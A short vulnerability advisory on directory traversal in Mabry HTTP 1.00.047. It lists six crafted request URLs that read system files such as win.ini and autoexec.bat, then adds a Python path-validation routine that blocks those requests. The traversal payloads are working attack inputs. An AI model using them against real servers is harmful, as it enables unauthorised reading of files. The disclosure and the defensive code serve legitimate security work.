MABRY HTTP Directory Traversal Vulnerabilities

Release Date: July 10, 2003
Severity: Root Compromise
Systems Affected: Mabry HTTP 1.00.047

Description:
A directory traversal vulnerability in the product allows remote attackers to view the contents of files that reside outside the bounding HTML root directory. When an attacker sends a request to the server in one of the following forms:

http://127.0.0.1/........../windows/win.ini
http://127.0.0.1/........./autoexec.bat
http://127.0.0.1/.../.../.../.../.../.../scandisk.log
http://127.0.0.1/../../../../../../../../../autoexec.bat
http://127.0.0.1/../../../../../../../../windows/win.ini
http://127.0.0.1/.html/............/autoexec.bat

the server will return the requested files.

Disclaimer
----------
The author(s) does(do) not have any responsibility for any malicious use of this advisory or proof of concept code. The code and the information provided here are for educational purposes only. The author(s) will NOT be held responsible for any direct or indirect damages caused by the information or the code provided here.

Acknowledgements
----------------
Vulnerability found and tested by dr_insane
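The request forms listed in the Description rely on dot-only path segments ("..", "..." and longer runs), so a server-side check has to reject those segments before mapping a URL to a file. The following is an added example, not code from the advisory or from Mabry: the document root C:\wwwroot and all function names are assumptions, and it goes slightly beyond the listed requests by also decoding percent-encoded dots and treating backslashes as separators.

```python
import ntpath  # Windows path rules, importable on any OS
from urllib.parse import unquote

DOC_ROOT = r"C:\wwwroot"  # assumed document root for this example

# Request paths quoted in the advisory above
ADVISORY_PATHS = [
    "/........../windows/win.ini",
    "/........./autoexec.bat",
    "/.../.../.../.../.../.../scandisk.log",
    "/../../../../../../../../../autoexec.bat",
    "/../../../../../../../../windows/win.ini",
    "/.html/............/autoexec.bat",
]

class TraversalError(ValueError):
    """The request path would resolve outside the document root."""

def resolve_request_path(url_path, doc_root=DOC_ROOT):
    """Return the file path under doc_root for url_path, or raise TraversalError."""
    decoded = unquote(url_path)  # decode %2e%2e and similar before any check
    if "\x00" in decoded or ":" in decoded:
        raise TraversalError("NUL byte or drive separator in path")
    clean = []
    # Backslash is a separator for Windows file APIs, so split on it as well.
    for seg in decoded.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        # Reject "..", "...", ".........." and any other dot/space-only segment
        # outright instead of trying to normalize it.
        if set(seg) <= {".", " "}:
            raise TraversalError(f"dot-only segment {seg!r}")
        clean.append(seg)
    candidate = ntpath.normpath(ntpath.join(doc_root, *clean))
    # Second, independent check: the final path must still sit under the root.
    root = ntpath.normcase(ntpath.normpath(doc_root))
    if ntpath.commonpath([root, ntpath.normcase(candidate)]) != root:
        raise TraversalError("path escapes document root")
    return candidate

def is_blocked(url_path):
    """True when resolve_request_path refuses the request path."""
    try:
        resolve_request_path(url_path)
    except TraversalError:
        return True
    return False
```

Calling is_blocked on each entry of ADVISORY_PATHS returns True, while an ordinary path such as /index.html resolves to a file under the assumed root.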